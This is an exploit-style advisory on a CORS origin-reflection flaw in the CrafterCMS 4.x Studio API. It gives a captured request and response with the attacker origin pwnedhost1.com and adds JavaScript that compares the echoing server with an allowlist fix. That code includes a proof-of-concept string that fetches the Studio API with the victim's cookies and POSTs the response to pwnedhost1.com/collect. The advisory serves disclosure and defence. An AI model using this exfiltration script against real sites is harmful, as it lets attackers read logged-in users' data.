## Exploit Title: craftercms 4.x.x - CORS
## Author: nu11secur1ty
## Date: 03.07.2023
## Vendor: https://docs.craftercms.org/en/4.0/index.html#
## Software: https://github.com/craftercms/craftercms/tags => 4.x.x
## Reference: https://portswigger.net/web-security/cors

## Description:
The Crafter Studio API answers cross-origin requests with an HTML5 cross-origin resource sharing (CORS) policy that reflects whatever Origin header the client supplies, together with Access-Control-Allow-Credentials: true. In the request below the origin http://pwnedhost1.com/, a domain under the attacker's control, is echoed back unchanged in Access-Control-Allow-Origin. A page served from that domain can therefore make credentialed (cookie-bearing) requests to the Studio API from a logged-in victim's browser and read the responses, i.e. full two-way interaction. Because the origin is reflected rather than matched against an allowlist, any domain obtains the same access; the browser's same-origin policy no longer protects the Studio session. Whether the null origin (for example from a sandboxed iframe) is also accepted is not shown in this transcript and should be tested separately.

Two things to check before relying on this finding. First, browsers never send a trailing slash in Origin and compare Access-Control-Allow-Origin byte-for-byte against the serialized origin, so the exploitable case is the server reflecting the browser's own form (http://pwnedhost1.com); a server that echoes the header verbatim, as seen here, will do that, but re-test with the exact browser form. Second, the endpoint used below returns public data (the list of available languages); the practical impact depends on the same policy applying to authenticated Studio endpoints, which the session cookies in the request suggest but this transcript does not by itself demonstrate.

STATUS: HIGH Vulnerability

[+]Exploit:

[-]REQUEST...
```
GET /studio/api/1/services/api/1/server/get-available-languages.json HTTP/1.1
Host: 192.168.100.87:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: XSRF-TOKEN=5ce93c90-2b85-4f9a-9646-2a1e655b1d3f; JSESSIONID=4730F0ED2120D31A17574CE997325DA8
Referer: http://192.168.100.87:8080/studio/login
x-requested-with: XMLHttpRequest
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Origin: http://pwnedhost1.com/
```

[-]RESPONSE:
```
HTTP/1.1 200
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: http://pwnedhost1.com/
Access-Control-Allow-Credentials: true
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Date: Tue, 07 Mar 2023 11:00:19 GMT
Connection: close
Content-Length: 124

[{"id":"en","label":"English"},{"id":"es","label":"Español"},{"id":"kr","label":"........."},{"id":"de","label":"Deutsch"}]
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/CrafterCMS/CrafterCMS-4.0.0)

## Proof and Exploit:
[href](https://streamable.com/jd1x8j)

## Time spend:
01:00:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty
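The origin-reflection problem described in the Description section, worked through in code. This is an added example and is not code from the advisory or from CrafterCMS: it models the vulnerable behaviour (echoing the Origin header verbatim) next to an allowlist-based replacement, and evaluates responses the way a browser's CORS check does, including the trailing-slash detail. SAMPLE_RESPONSE is constructed from the advisory's response headers; the allowlist entry, the collection URL and the function names are assumptions.

```javascript
// Added example, not part of the advisory or of CrafterCMS.

// Browsers compare Access-Control-Allow-Origin byte-for-byte against the
// serialized origin (scheme://host[:port], no path, no trailing slash).
function serializeOrigin(urlString) {
  return new URL(urlString).origin;
}

// Case-insensitive header lookup.
function headerMap(headers) {
  const m = new Map();
  for (const [k, v] of Object.entries(headers)) m.set(k.toLowerCase(), String(v));
  return m;
}

// What a browser at `probeOrigin` would be permitted to do with this response.
// Returns: 'origin-allowed-with-credentials' | 'origin-allowed' |
//          'wildcard' | 'wildcard-with-credentials' (browsers reject this
//          combination) | 'not-allowed'
function classifyCors(probeOrigin, responseHeaders) {
  const h = headerMap(responseHeaders);
  const acao = h.get('access-control-allow-origin');
  const creds = (h.get('access-control-allow-credentials') || '').toLowerCase() === 'true';
  if (acao === undefined) return 'not-allowed';
  if (acao === '*') return creds ? 'wildcard-with-credentials' : 'wildcard';
  if (acao !== probeOrigin) return 'not-allowed';
  return creds ? 'origin-allowed-with-credentials' : 'origin-allowed';
}

// Model of the vulnerable behaviour: echo whatever Origin arrived.
function reflectingServerHeaders(requestOrigin) {
  return {
    'Vary': 'Origin',
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened replacement: only an exact, configured origin is echoed, and
// Vary: Origin is always emitted so a shared cache cannot hand one origin's
// CORS headers to another. Requests without a matching Origin get no CORS
// headers at all.
function allowlistServerHeaders(requestOrigin, allowlist) {
  const headers = { 'Vary': 'Origin' };
  if (requestOrigin !== undefined && allowlist.includes(requestOrigin)) {
    headers['Access-Control-Allow-Origin'] = requestOrigin;
    headers['Access-Control-Allow-Credentials'] = 'true';
  }
  return headers;
}

// Constructed subset of the advisory's response headers.
const SAMPLE_RESPONSE = {
  'Vary': 'Origin',
  'Access-Control-Allow-Origin': 'http://pwnedhost1.com/',
  'Access-Control-Allow-Credentials': 'true',
  'Content-Type': 'application/json;charset=UTF-8',
};

// Script an attacker page on the reflected origin would run in the victim's
// browser once reflection is confirmed; collectUrl is a hypothetical endpoint.
function pocScript(targetUrl, collectUrl) {
  return `fetch(${JSON.stringify(targetUrl)}, { credentials: 'include' })
  .then(r => r.text())
  .then(body => fetch(${JSON.stringify(collectUrl)}, { method: 'POST', body }));`;
}

function demo() {
  const attacker = serializeOrigin('http://pwnedhost1.com/'); // 'http://pwnedhost1.com'
  const trusted = 'https://studio.example.com';               // assumed allowlist entry
  return {
    // The transcript's Origin carried a trailing slash, so the echoed value
    // would not satisfy a real browser's check against its serialized origin...
    transcriptAsBrowserSeesIt: classifyCors(attacker, SAMPLE_RESPONSE),
    // ...but a server that echoes verbatim reflects the browser's form as well.
    reflectedForRealBrowser: classifyCors(attacker, reflectingServerHeaders(attacker)),
    attackerAgainstAllowlist: classifyCors(attacker, allowlistServerHeaders(attacker, [trusted])),
    trustedAgainstAllowlist: classifyCors(trusted, allowlistServerHeaders(trusted, [trusted])),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
  console.log(pocScript(
    'http://192.168.100.87:8080/studio/api/1/services/api/1/server/get-available-languages.json',
    'https://pwnedhost1.com/collect'));
}
```

Run it with `node cors_check.js`. The four entries returned by `demo()` are the checks a reviewer wants side by side: the literal transcript would fail a browser's exact-match comparison because of the slash, a verbatim echo still passes for the slash-less origin a real browser sends, and the allowlist version refuses the attacker origin while keeping the trusted one working with credentials.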